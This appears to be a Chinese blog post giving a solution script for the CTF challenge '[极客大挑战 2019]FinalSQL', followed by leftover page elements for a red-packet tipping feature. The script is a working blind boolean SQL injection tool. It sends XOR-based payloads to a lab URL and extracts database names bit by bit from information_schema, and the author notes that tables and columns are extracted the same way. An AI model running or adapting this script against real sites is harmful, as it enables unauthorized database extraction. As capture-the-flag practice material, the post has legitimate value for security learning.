[极客大挑战 2019]FinalSQL1

具体的思路网上也还有其他的,这里我就分享一个脚本
这个是爆数据名,表名,列名类推

import requests
import time

database_all = ''


url = 'http://7023b2d9-28ff-48a1-b167-05f060adfc6e.node4.buuoj.cn/search.php?id=1'
# 求出总长度的位数,比如说如果总长度为43,那么就是2位数
weishu = ''
for i in range(1, 7):
    sql = "^(substr(bin(ascii(length(length((select(group_concat(SCHEMA_NAME))from(information_schema.SCHEMATA)))))),{},1)=1)^1".format(i)
    re = requests.get(url+sql, timeout=1000)
    if re.status_code == 200:
        if 'Click' in re.text:
            weishu += '1'
        else:
            weishu += '0'
weishu = int(chr(int(weishu, 2)))
# 求出具体的总长度
len = ''
for i in range(1, weishu+1):
    len_wei = ''
    for j in range(1, 7):
        sql = "^(substr(bin(ascii(substr(length((select(group_concat(SCHEMA_NAME))from(information_schema.SCHEMATA))),{},1))),{},1)=1)^1".format(i, j)
        re = requests.get(url+sql, timeout=1000)
        if re.status_code == 200:
            if 'Click' in re.text:
                len_wei += '1'
            else:
                len_wei += '0'
    len += chr(int(len_wei, 2))
for i in range(1, int(len)+1):
    sql = "^(length(bin(ascii(substr((select(group_concat(SCHEMA_NAME))from(information_schema.SCHEMATA)),{},1))))=7)^1".format(i)
    re = requests.get(url+sql, timeout=1000)
    time.sleep(1)
    if re.status_code == 200:
        if 'Click' in re.text:
            len = 7
        else:
            len = 6
    str = ''
    for j in range(1, len+1):
        sql = '^(substr(bin(ascii(substr((select(group_concat(SCHEMA_NAME))from(information_schema.SCHEMATA)),{},1))),{},1)=1)^1'.format(
            i, j)
        re = requests.get(url+sql, timeout=1000)
        time.sleep(1)
        if re.status_code == 200:
            if 'Click' in re.text:
                str += '1'
            else:
                str += '0'
    database_all += chr(int(str, 2))
    print(database_all)

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值